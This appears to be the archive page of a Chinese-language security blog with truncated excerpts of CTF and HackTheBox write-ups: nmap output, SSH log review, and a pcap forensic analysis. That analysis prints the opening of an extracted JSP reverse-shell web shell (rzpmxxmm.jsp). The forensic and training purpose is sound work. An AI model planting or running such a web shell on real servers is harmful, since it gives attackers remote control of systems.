问题
先看它为何值得解。
安全 · 深度学习 · 大语言模型
从攻防现场到模型推演,再到系统试验;愿每一篇都经得起回望。
从数学、代码与 D2L 起步,沿着模型、论文和实验前行。
沿路线阅读 攻防与防守靶场、应急响应、域渗透与 CTF;从关键判断,回到防守视角。
进入归档阅读线索
先看它为何值得解。
回到推导、代码与现场。
不替未知急着下结论。
文章归档
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
0x01 信息收集 ┌──(root㉿kali)-[/home/kali/HTB/Intelligence] └─# nmap -A 10.129.224.3 Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 03:08 EDT Nmap scan report for 10.129.224.3 Host is up (0.12s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open...
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
下载附件,是一个pcap流量包。首先要我们分析扫描的IP,使用筛选GET请求数据包,可快速定位到恶意IP。在使用查询软件即可定位IP所在城市为广州。 筛选IP源为14.0.0.120的HTTP数据包,查看访问manager路由的数据包,在Destination字段可看到访问的目的端口为8080。故8080端口提供对服务器管理面板的访问 分析攻击者使用的攻击工具,我们就需要先定位攻击者的攻击流量。找到唯一一个POST包,将包保存下来后我们使用foremost提取出之中的压缩包,解压后我们找到一个rzpmxxmm.jsp <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream ns; OutputStream vA; StreamConnector( InputStream ns, OutputStream vA ) { this.ns = ns; this.vA = vA; } public void run() { BufferedReader...
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
上线后我们首先查看SSH的日志。处于/var/log/secure内。分析日志我们发现可疑IP [root@ip-10-0-10-4 log]# cat secure Mar 20 10:30:24 web-server sshd[1054]: Received SIGHUP; restarting. Mar 20 10:30:24 web-server sshd[1054]: Server listening on 0.0.0.0 port 22. Mar 20 10:30:24 web-server sshd[1054]: Server listening on :: port 22. Mar 20 10:30:25 web-server sshd[4111]:...